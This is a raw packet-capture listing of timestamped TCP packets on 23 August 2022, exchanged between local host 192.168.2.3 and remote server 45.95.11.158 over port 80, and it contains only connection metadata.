Aug 23, 2022 18:23:57.582432985 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.582444906 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.582504988 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.582540989 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.582551003 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.582571030 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.582612038 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.582633018 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.582647085 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.582680941 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.582691908 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.582715034 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.582760096 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.582834959 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.582881927 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.583086014 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.583100080 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.583144903 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.583158970 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.583241940 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.583268881 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.583288908 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.583295107 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.583307028 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.583317041 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.583338976 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.583360910 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.583395004 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.583441019 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.583559036 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.583607912 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.583636999 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.583651066 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.583688974 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.583719969 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.583738089 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.583781004 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.583801031 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.583830118 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.583844900 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.583872080 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.583877087 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.583908081 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.583920956 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.583931923 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.583949089 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.583970070 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.584439039 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.584510088 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.587518930 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.587538958 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.587600946 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.587622881 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.587635040 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.587682009 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.587871075 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.587924004 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.587955952 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.588001966 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.588022947 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.588067055 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.588304996 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.588318110 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.588359118 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.588391066 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.592232943 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.592259884 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.592279911 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.592291117 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.592345953 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.592360973 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.608937979 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.608973026 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.608999014 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.609019041 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.609112024 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.609143972 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.622169971 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.622219086 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.622256994 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.622287035 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.622313976 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.622327089 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.622339964 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.622371912 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.622404099 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.622411966 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.622438908 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.622441053 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.622478008 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.622483969 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.622492075 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.622517109 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.622522116 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.622596025 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.622615099 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.622623920 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.622664928 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.622703075 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.622741938 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.622770071 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.622775078 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.622782946 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.622786045 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.622798920 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.622826099 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.622838020 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.622878075 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.622906923 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.622946978 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.622967005 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.622983932 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.622983932 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.623001099 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.623023033 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.623034954 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.623049974 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.623068094 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.623091936 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.623104095 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.623133898 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.623136997 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.623172045 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.623178959 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.623199940 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.623223066 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.623239040 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.623250961 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.623275995 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.623284101 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.623315096 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.623318911 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.623342991 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.623369932 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.623413086 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.623749018 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.623791933 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.623811007 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.623830080 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.623837948 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.623857021 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.623872995 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.623910904 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.625050068 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.625098944 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.625165939 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.625196934 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.625643015 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.625677109 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.625714064 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.625720024 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.625746965 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.625752926 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.625786066 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.625806093 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.625952005 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.625981092 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.626060963 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.626079082 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.626287937 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.626375914 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.626435041 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.626475096 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.626493931 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.626580954 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.627613068 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.627674103 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.627712011 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.627715111 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.627734900 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.627743006 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.627783060 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.627783060 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.627794981 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.627821922 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.627857924 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.627865076 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.627875090 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.627902985 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.627981901 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.627988100 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.628525972 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.628596067 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.628627062 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.628660917 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.628772974 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.628819942 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.628830910 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.628866911 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.628990889 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.629049063 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.629060030 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.629111052 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.629204988 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.629240990 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.629266977 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.629282951 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.629295111 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.629348993 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.629393101 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.629405975 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.629431009 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.629442930 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.629477024 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.629489899 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.629545927 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.629553080 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.629600048 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.629606962 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.629645109 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.629656076 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.629699945 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.629703999 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.629754066 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.629759073 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.629808903 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.629813910 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.629853010 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.629895926 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.629944086 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.629950047 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.629959106 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.629997969 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.630006075 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.630044937 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.630189896 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.630198002 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.630260944 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.630316019 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.630399942 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.630456924 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.630456924 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.630496025 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.630520105 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.630546093 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.630548000 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.630598068 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.630604029 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.630650043 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.630666971 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.630703926 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.630714893 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.630755901 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.630759001 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.630809069 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.630817890 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.630882025 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.630887985 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.630925894 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.630944967 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.630980015 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.630985022 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.631022930 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.631032944 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.631077051 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.631091118 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.631135941 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.631169081 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.631181002 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.631184101 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.631222963 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.631223917 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.631261110 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.631264925 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.631292105 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.631304979 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.631366014 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.631371975 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.631428003 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.631450891 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.631498098 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.631500006 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.631534100 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.631546021 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.631556988 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.631580114 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.631588936 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.631604910 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.631620884 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.631620884 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.631645918 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.631654978 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.631669998 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.631685019 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.631691933 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.631702900 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.631707907 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.631727934 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.631742954 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.631762028 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.654207945 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.654324055 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.654333115 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.654377937 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.654403925 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.654429913 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.654434919 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.654478073 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.654483080 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.654525042 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.654534101 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.654584885 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.657080889 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.657161951 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.657236099 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.657273054 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.657309055 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.657319069 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.657331944 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.657378912 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.657442093 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.657476902 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.657505035 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.657524109 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.657527924 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.657596111 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.657619953 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.657674074 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.657675982 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.657722950 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.657748938 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.657774925 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.657794952 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.657829046 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.657840967 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.657881021 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.657893896 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.657933950 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.657957077 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.657987118 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.657998085 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.658041000 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.658054113 CEST	49827	80	192.168.2.3	45.95.11.158
